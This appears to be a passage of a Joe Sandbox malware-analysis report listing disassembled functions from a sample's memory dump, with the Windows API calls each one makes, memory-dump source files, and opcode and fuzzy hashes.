                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                        • Opcode ID: c7819ba1625cf0700d47d86096c70ee12dc54d99003267509671ebc8c19356dd
                                                                                                                                                        • Instruction ID: 65e9ffd7576f24b81cd6e6889531d451f489142b40338e1468a2a96299a8a922
                                                                                                                                                        • Opcode Fuzzy Hash: c7819ba1625cf0700d47d86096c70ee12dc54d99003267509671ebc8c19356dd
                                                                                                                                                        • Instruction Fuzzy Hash: 3641F2F1A00248ABEF208B659848BFDBBB5AB5D311F04415BF487973C1CB7489C59B62
                                                                                                                                                        Function 00AFEFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AFEFE2
                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B0F3C3,?,?,?,?,?), ref: 00AFEFF7
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AFF041
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B0F3C3,?,?,?), ref: 00AFF077
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1423138444-0
                                                                                                                                                        • Opcode ID: 439405e162395ae1de18cf9073b67bb6ccb01df375efeb18140a64f0e939a102
                                                                                                                                                        • Instruction ID: 3bf1fcf76baa129981ec7e738c3d211af3640420e657fd395e210efc0c80e1a8
                                                                                                                                                        • Opcode Fuzzy Hash: 439405e162395ae1de18cf9073b67bb6ccb01df375efeb18140a64f0e939a102
                                                                                                                                                        • Instruction Fuzzy Hash: 7E21BF35600128AFCB258F98CC98FFA7BB5EF49754F0440A9FA05972A2DB319D51DBA0
                                                                                                                                                        Function 00AD220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AD221E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                        • String ID: ($|
                                                                                                                                                        • API String ID: 1659193697-1631851259
                                                                                                                                                        • Opcode ID: f36fdfea4fb0294cde6ff60b93ece1779248360c00feee6069e636a8fdad69da
                                                                                                                                                        • Instruction ID: 98ed8696a321bf73edfc82146d81fff7423f8ec32e99a046d98b940b151bf045
                                                                                                                                                        • Opcode Fuzzy Hash: f36fdfea4fb0294cde6ff60b93ece1779248360c00feee6069e636a8fdad69da
                                                                                                                                                        • Instruction Fuzzy Hash: 3A321475A007059FCB28CF69C480AAAB7F0FF58320B15C56EE49ADB7A1E770E941CB44
                                                                                                                                                        Function 00AAAD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00AAAE5E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        • Opcode ID: aed90df63eee2fada9648deb9731ded3987f3dcb31a63c70da72939f9abd4a1c
                                                                                                                                                        • Instruction ID: 1d22a91ee37e1bd3a85429698f554e045bc37f91b65c9fa61ea93b91db895170
                                                                                                                                                        • Opcode Fuzzy Hash: aed90df63eee2fada9648deb9731ded3987f3dcb31a63c70da72939f9abd4a1c
                                                                                                                                                        • Instruction Fuzzy Hash: DFA10570204216BEDB38AB298D88EBF39EDEB67751B10456EF502D75E2DB258C01D273
                                                                                                                                                        Function 00AE550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00AE4A1E,00000000), ref: 00AE55FD
                                                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AE5629
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 599397726-0
                                                                                                                                                        • Opcode ID: aa087742c07e5ef3a7becaa68c030ffde7fa74ee4a4631e4d2d46997a9f29664
                                                                                                                                                        • Instruction ID: 49ec9dc6559877161e91bf8ffdb34fdabe4d68020e3f8c3b86cfcea34a4fa620
                                                                                                                                                        • Opcode Fuzzy Hash: aa087742c07e5ef3a7becaa68c030ffde7fa74ee4a4631e4d2d46997a9f29664
                                                                                                                                                        • Instruction Fuzzy Hash: 1E410571D00A49BFEB109FA6ED85EBFB7BDEB4071CF14401AF605A7181DA709E419B60
                                                                                                                                                        Function 00ADEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00ADEA95
                                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00ADEAEF
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00ADEB3C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1682464887-0
                                                                                                                                                        • Opcode ID: e97f686cceba1b7023b0cad9fe6d1922ddf3ccfe6984f9d516636836a2dee2d8
                                                                                                                                                        • Instruction ID: e06e1482fd39e7a770768be8b23c94095bf74fc49c2682a3f83f6602a785c2b9
                                                                                                                                                        • Opcode Fuzzy Hash: e97f686cceba1b7023b0cad9fe6d1922ddf3ccfe6984f9d516636836a2dee2d8
                                                                                                                                                        • Instruction Fuzzy Hash: 6C215E35A00218EFCB00EFA5D995AEDBBF8FF49310F14849AE806AB351DB35E915CB50
                                                                                                                                                        Function 00AD70AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD70D8
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00AD7115
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD711E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 33631002-0
                                                                                                                                                        • Opcode ID: c1026324e098b80a35341a27c9f5362b29340223800cba4e5415f69f6029ff01
                                                                                                                                                        • Instruction ID: d32c8b878484698c88a2aa550bb5c6ecc949ec0e00d376496c9611fc2df775ea
                                                                                                                                                        • Opcode Fuzzy Hash: c1026324e098b80a35341a27c9f5362b29340223800cba4e5415f69f6029ff01
                                                                                                                                                        • Instruction Fuzzy Hash: 4E11A5B1900229BEE7108BA8DC45FEFB7BCEB08714F404656B901F72A0D6B49E0487E1
                                                                                                                                                        Function 00A96670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: 72a24b7a2e7163179f9035deca2ebbe289b34cd2219913959bdd873ba2b9dfca
                                                                                                                                                        • Instruction ID: 2e92734ad194dd170fea6e21118d441def59ebe4d44288ea974b3248588099d3
                                                                                                                                                        • Opcode Fuzzy Hash: 72a24b7a2e7163179f9035deca2ebbe289b34cd2219913959bdd873ba2b9dfca
                                                                                                                                                        • Instruction Fuzzy Hash: BEA22575E00219DBCF24CF58C8806ADBBF1FF48314F6581AAE859AB390D7749E91DB90
                                                                                                                                                        Function 00AAAFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        • GetParent.USER32(?), ref: 00B0F4B5
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00AAADDD,?,?,?,00000006,?), ref: 00B0F52F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 314495775-0
                                                                                                                                                        • Opcode ID: 4a5606095065bb88c7c1ee17a5a8aefa5793ce747bd9014b0303146138c61b56
                                                                                                                                                        • Instruction ID: fde588804a53a39fb22321e41f69473566f14d523754a49526eb3c35f4125866
                                                                                                                                                        • Opcode Fuzzy Hash: 4a5606095065bb88c7c1ee17a5a8aefa5793ce747bd9014b0303146138c61b56
                                                                                                                                                        • Instruction Fuzzy Hash: 26215E35210104AFCB399F28D948BAA3BE6EB4B364F1846A4F5294B2F3D7319E11D760
                                                                                                                                                        Function 00AFF0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00B0F352,?,?,?), ref: 00AFF115
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00AFF0FB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1273190321-0
                                                                                                                                                        • Opcode ID: b8cc2d3056e8b66e7b89da47f387224ca1fda3c643ba617178fff7e017448027
                                                                                                                                                        • Instruction ID: ab42ef384644aa1d22f11226a69a0eb256902652164ec2380f959a128aa0f0cc
                                                                                                                                                        • Opcode Fuzzy Hash: b8cc2d3056e8b66e7b89da47f387224ca1fda3c643ba617178fff7e017448027
                                                                                                                                                        • Instruction Fuzzy Hash: 9E01B131200208EFCB219F58DC45FBA3BB6FF86364F144668FA160B2E1CB729802DB51
                                                                                                                                                        Function 00AFF45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFF47D
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00B0F42E,?,?,?,?,?), ref: 00AFF4A6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3420055661-0
                                                                                                                                                        • Opcode ID: 9754d44f6e22c9fab28011a0456589bb505004b5f76cf2a4e088982850980480
                                                                                                                                                        • Instruction ID: f8a50ba7a1f8b5a72f0e17c3e99a23f401afcf25cc78fd04c223c0e58709cdd8
                                                                                                                                                        • Opcode Fuzzy Hash: 9754d44f6e22c9fab28011a0456589bb505004b5f76cf2a4e088982850980480
                                                                                                                                                        • Instruction Fuzzy Hash: 0BF01772410118BFEB049F95DC09AEE7BB9FF48351F10805AFA02A2160D7B5AA51EB60
                                                                                                                                                        Function 00ADD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
